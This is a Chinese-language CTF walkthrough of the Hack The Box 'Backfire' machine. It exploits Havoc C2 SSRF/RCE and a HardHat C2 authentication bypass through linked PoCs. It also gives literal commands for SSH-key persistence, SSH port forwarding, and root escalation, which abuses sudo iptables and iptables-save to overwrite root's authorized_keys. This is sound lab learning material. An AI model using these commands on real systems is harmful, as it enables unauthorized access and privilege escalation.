HTB-Backfire

HTB-Backfire

信息收集

8000 22 443端口开启。

image-20250120104720463

访问8000端口 发现有两个文件

image-20250120105106407

漏洞利用

下载下来看看 发现是一个Havoc

经过搜索得到一个SSRF的漏洞 参考链接:https://github.com/HimmeL-Byte/CVE-2024-41570-SSRF-RCE

尝试着打一下 发现可以

登录进去之后发现shell并不长久 我们可以通过ssh的公私钥对 进行一个ssh的持久化。

首先输入 ssh-keygen 让系统生成一个公钥和私钥 然后我们将公钥放在authorized_keys中 并且赋予权限600 对.ssh赋予700的权限

将私钥拉下来 然后同样赋予600权限 最后利用私钥进行ssh登录。

image-20250121205735620

home目录下存在两个用户 下一步要获取另外一个用户的权限。

netstat -tuln 看一下 发现两个内部的端口 ssh映射一下。

image-20250121211421473

1
ssh -L 7096:127.0.0.1:7096 -L 5000:127.0.0.1:5000 ilya@10.10.11.49 -i id_rsa

image-20250121212752925

搜索到一个身份验证绕过的漏洞。

https://github.com/thisisveryfunny/HardHat-C2-Auth-Bypass/tree/main

image-20250121215349572

会自动生成一个用户和密码让去登录。

然后将公钥文件输入到同样的文件中

1
echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINm/pUT/9gMKllPLVgrNw8VMetEBvjG5IuKq3qjCSHSP ilya@backfire" >>/home/sergej/.ssh/authorized_keys

image-20250121223321587

image-20250121223337004

提权

sudo -l 看一下 发现可以iptables和iptables-save提权

image-20250121223538200

参考链接:https://cn-sec.com/archives/3193918.html

就是将公钥文件以注释的方式添加到规则中 然后利用iptables -save 进行一个覆盖。

1
2
3
sudo /usr/sbin/iptables -A INPUT -i lo -j ACCEPT -m comment --comment $'\nssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINm/pUT/9gMKllxxxxxw8VMetEBvjG5IuKq3qjCSHSP ilya@backfire\n'
sudo /usr/sbin/iptables-save -f /root/.ssh/authorized_keys
sudo /usr/sbin/iptables -S

之前的那个公钥搞的太长了 后面又换了一个

1
ssh-keygen -t ed25519

image-20250121235316188

image-20250122000457903


HTB-Backfire
http://example.com/2025/02/02/HTB-Backfire/
作者
FSRM
发布于
2025年2月2日
更新于
2025年2月2日
许可协议